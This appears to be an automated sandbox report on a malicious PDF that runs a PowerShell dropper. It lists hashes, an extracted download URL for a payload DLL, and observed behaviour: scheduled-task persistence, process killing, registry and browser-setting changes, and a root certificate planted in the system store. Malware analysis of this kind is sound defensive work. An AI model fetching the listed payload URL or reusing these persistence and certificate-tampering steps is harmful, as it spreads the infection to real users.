Overview

overview

10

Static

static

3

order 17052022.pdf

windows7_x64

10

order 17052022.pdf

windows10-2004_x64

10
General
Target

order 17052022.pdf

Filesize

30KB

Completed

17-05-2022 19:26

Task

behavioral1

Score
10/10
MD5

f7da10c601fc5c0c2caef9f4e06508ad

SHA1

b1f40f4752866c30fbd6654f4844d13ae2958946

SHA256

0bf9fd42a0dc842dfe8ad1d5fdaa3f74e5e2ff602887dcfdbc14466f51eef6e0

SHA256

999c1cf265bd24b51a75bbe6651b2c5b7637b8df6e89a5740e31b6d9e9a74bff19c5ddd8fb445d42cfbe01f26c92db0afa273480f85895a83530ed68a9a392c3

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
ps1.dropper

https://www.mediafire.com/file/ivgr6qe4jfzd1w9/14.dll/file
Signatures 18

Filter: none

Defense Evasion
Discovery
Persistence
  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flowpidprocess
    411932powershell.exe
    431932powershell.exe
    441932powershell.exe
  • Executes dropped EXE
    ddond.com

    Reported IOCs

    pidprocess
    1288ddond.com
  • Loads dropped DLL
    POWERPNT.EXE

    Reported IOCs

    pidprocess
    824POWERPNT.EXE
    824POWERPNT.EXE
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Creates scheduled task(s)
    schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    Tags

    TTPs

    Scheduled Task

    Reported IOCs

    pidprocess
    616schtasks.exe
  • Kills process with taskkill
    taskkill.exetaskkill.exetaskkill.exe

    Tags

    Reported IOCs

    pidprocess
    1356taskkill.exe
    1936taskkill.exe
    1916taskkill.exe
  • Modifies Internet Explorer Phishing Filter
    iexplore.exe

    TTPs

    Modify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\PhishingFilteriexplore.exe
    Set value (data)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 406d6ebd236ad801iexplore.exe
  • Modifies Internet Explorer settings
    iexplore.exePOWERPNT.EXEddond.comIEXPLORE.EXE

    Tags

    TTPs

    Modify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbariexplore.exe
    Key deleted\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shellPOWERPNT.EXE
    Key deleted\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML EditorPOWERPNT.EXE
    Key deleted\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMANDPOWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shellPOWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""POWERPNT.EXE
    Set value (data)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 2c0000000000000000000000ffffffffffffffffffffffffffffffff100100003d000000900300001d020000iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\GPUiexplore.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000POWERPNT.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNamesiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MINIEiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\PageSetupiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\IntelliFormsiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowseriexplore.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\ToolbarPOWERPNT.EXE
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000POWERPNT.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgainiexplore.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"POWERPNT.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shellPOWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"POWERPNT.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Mainiexplore.exe
    Key deleted\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMANDPOWERPNT.EXE
    Key deleted\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\editPOWERPNT.EXE
    Key deleted\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML EditorPOWERPNT.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Zoomiexplore.exe
    Set value (data)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000iexplore.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\editPOWERPNT.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorageiexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft ExcelPOWERPNT.EXE
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"POWERPNT.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExtPOWERPNT.EXE
    Key deleted\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\editPOWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML EditorPOWERPNT.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActiveiexplore.exe
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"POWERPNT.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistryiexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML EditorPOWERPNT.EXE
    Key deleted\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shellPOWERPNT.EXE
    Set value (int)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "359580438"iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Mainddond.com
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMiciexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNotePOWERPNT.EXE
    Set value (int)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\commandPOWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\commandPOWERPNT.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestioniexplore.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"iexplore.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"iexplore.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\editPOWERPNT.EXE
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecoveryiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MainIEXPLORE.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""POWERPNT.EXE
    Set value (int)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F51E02A1-D616-11EC-BA97-DE95627D9645} = "0"iexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\InternetRegistryiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearchiexplore.exe
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\IETld\LowMiciexplore.exe
  • Modifies registry class
    POWERPNT.EXE

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493472-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C8-5A91-11CF-8700-00AA0060263B}POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D3-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E0-5A91-11CF-8700-00AA0060263B}\TypeLibPOWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A60-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347D-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DC-5A91-11CF-8700-00AA0060263B}\TypeLibPOWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A79-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493451-5A91-11CF-8700-00AA0060263B}\TypeLibPOWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493490-5A91-11CF-8700-00AA0060263B}\ = "Ruler"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E2-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5E-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellExPOWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493458-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345E-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493470-5A91-11CF-8700-00AA0060263B}\ = "RGBColor"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347C-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348C-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DF-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EF-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345B-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493464-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DB-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EC-5A91-11CF-8700-00AA0060263B}POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5B-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A62-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349C-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CE-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F2-5A91-11CF-8700-00AA0060263B}POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A58-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A71-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLibPOWERPNT.EXE
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149346C-5A91-11CF-8700-00AA0060263B}POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493493-5A91-11CF-8700-00AA0060263B}POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D6-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DB-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E5-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A63-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E554-4FF5-48F4-8215-5505F990966F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493453-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349A-5A91-11CF-8700-00AA0060263B}\TypeLibPOWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934B9-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CB-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DC-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A73-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7A-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "Trendlines"POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\PrintPOWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493450-5A91-11CF-8700-00AA0060263B}\ = "Collection"POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493471-5A91-11CF-8700-00AA0060263B}POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493442-5A91-11CF-8700-00AA0060263B}\ = "_Application"POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149347B-5A91-11CF-8700-00AA0060263B}POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493496-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E554-4FF5-48F4-8215-5505F990966F}\TypeLibPOWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E555-4FF5-48F4-8215-5505F990966F}POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493465-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D0-5A91-11CF-8700-00AA0060263B}\TypeLibPOWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EF-5A91-11CF-8700-00AA0060263B}\ = "CommandEffect"POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A57-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493478-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32POWERPNT.EXE
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CC-5A91-11CF-8700-00AA0060263B}\TypeLibPOWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CF-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"POWERPNT.EXE
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D4-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"POWERPNT.EXE
  • Modifies system certificate store
    ddond.com

    Tags

    TTPs

    Install Root CertificateModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184Cddond.com
    Set value (data)\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 4b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9040000000100000010000000285ec909c4ab0d2d57f5086b225799aa1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c2000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95ddond.com
  • Suspicious behavior: AddClipboardFormatListener
    POWERPNT.EXE

    Reported IOCs

    pidprocess
    824POWERPNT.EXE
  • Suspicious behavior: EnumeratesProcesses
    taskmgr.exepowershell.exe

    Reported IOCs

    pidprocess
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1708taskmgr.exe
    1932powershell.exe
  • Suspicious behavior: GetForegroundWindowSpam
    taskmgr.exe

    Reported IOCs

    pidprocess
    1708taskmgr.exe
  • Suspicious use of AdjustPrivilegeToken
